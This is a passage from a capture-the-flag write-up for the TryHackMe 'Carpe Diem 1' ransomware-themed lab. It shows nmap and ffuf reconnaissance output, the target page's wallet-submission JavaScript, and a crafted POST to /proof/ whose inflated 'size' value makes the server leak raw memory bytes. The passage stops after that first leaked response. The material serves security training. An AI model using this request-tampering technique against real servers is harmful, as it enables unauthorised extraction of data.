Carpe Diem 1
Recover your clients encrypted files before the ransomware timer runs out!
Topic's
- Network Enumeration
- Web Poking
- Web Enumeration
- Cross Site XMLHttpRequest
- Enumeration (GraphQL)
- Brute Forcing (KDBX KeePass)
Appendix archive
Password: 1 kn0w 1 5h0uldn'7!
Task 1 Pay...back!
One of your clients has been hacked by the Carpe Diem cyber gang and all their important files have been encrypted. They have hired you to help them recover an important file that they need to restore their backups. They have contacted the carpe diem cybergang and paid a ransom but have not heard anything back.
The countdown timer is ticking since they visited and they are now running out of time to recover their data before the keys are deleted on the server. Can you retrieve the keys and help your client restore their data before time runs out?
The file is available to download on the machine: /downloads/Database.carp
(The downloads-section is not a part of the challenge)
kali@kali:~/CTFs/tryhackme/Carpe Diem 1$ sudo nmap -A -sS -sC -sV -O 10.10.99.101
[sudo] password for kali:
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-22 17:46 CEST
Nmap scan report for 10.10.99.101
Host is up (0.034s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.6.2
|_http-server-header: nginx/1.6.2
|_http-title: Home
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 44590/tcp status
| 100024 1 45539/udp status
| 100024 1 48106/udp6 status
|_ 100024 1 55537/tcp6 status
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=10/22%OT=80%CT=1%CU=35899%PV=Y%DS=2%DC=T%G=Y%TM=5F91A9
OS:54%P=x86_64-pc-linux-gnu)SEQ(SP=101%GCD=1%ISR=10B%TI=Z%CI=I%II=I%TS=8)OP
OS:S(O1=M508ST11NW7%O2=M508ST11NW7%O3=M508NNT11NW7%O4=M508ST11NW7%O5=M508ST
OS:11NW7%O6=M508ST11)WIN(W1=68DF%W2=68DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)EC
OS:N(R=Y%DF=Y%T=40%W=6903%O=M508NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=
OS:AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(
OS:R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%
OS:F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N
OS:%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%C
OS:D=S)
Network Distance: 2 hops
TRACEROUTE (using port 110/tcp)
HOP RTT ADDRESS
1 33.52 ms 10.8.0.1
2 33.65 ms 10.10.99.101
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.85 seconds
<script>
function aaa(wallet) {
var wallet = wallet;
if (wallet.trim() === "bc1q989cy4zp8x9xpxgwpznsxx44u0cxhyjjyp78hj") {
alert("Hey! \n\nstupid is as stupid does...");
return;
}
var re = new RegExp("^([a-z0-9]{42,42})$");
if (re.test(wallet.trim())) {
var http = new XMLHttpRequest();
var url = "http://c4rp3d13m.net/proof/";
http.open("POST", url, true);
http.setRequestHeader("Content-type", "application/json");
var d = '{"size":42,"proof":"' + wallet + '"}';
http.onreadystatechange = function () {
if (http.readyState == 4 && http.status == 200) {
//alert(http.responseText);
}
};
http.send(d);
} else {
alert("Invalid wallet!");
}
}
</script>
kali@kali:~/CTFs/tryhackme/Carpe Diem 1$ /opt/ffuf/ffuf -c -u http://10.10.99.101/FUZZ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-large-directories.txt
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.2.0-git
________________________________________________
:: Method : GET
:: URL : http://10.10.99.101/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-large-directories.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403
________________________________________________
images [Status: 301, Size: 179, Words: 7, Lines: 11]
downloads [Status: 301, Size: 185, Words: 7, Lines: 11]
javascripts [Status: 301, Size: 189, Words: 7, Lines: 11]
stylesheets [Status: 301, Size: 189, Words: 7, Lines: 11]
Downloads [Status: 200, Size: 483, Words: 18, Lines: 1]
http://c4rp3d13m.net/downloads/Database.carp
POST /proof/ HTTP/1.1
Host: c4rp3d13m.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://c4rp3d13m.net/
Content-type: application/json
Content-Length: 65
Connection: close
Cookie: session=MTAuOC4xMDYuMjIy; countdown=2020-10-22T15%3A46%3A27.560557
{"size":420,"proof":"bc1q989cy4zp8x9xpxgwpznsxx44u0cxhyjjyp78hs"}
HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 22 Oct 2020 16:23:17 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: Express
Last-Modified: Thursday, 22-Oct-2020 16:23:17 GMT
Cache-Control: no-store, no-cache, must-revalidate, proxy-revalidate, max-age=0
Content-Length: 982
bc1q989cy4zp8x9xpxgwpznsxx44u0cxhyjjyp78hs�M�8 jade_interpg2% �� �� B�zf= � 7 (�� � 7 ��� � @ `�� ��� ��� ��� (�� ��� � �.�M�8 ����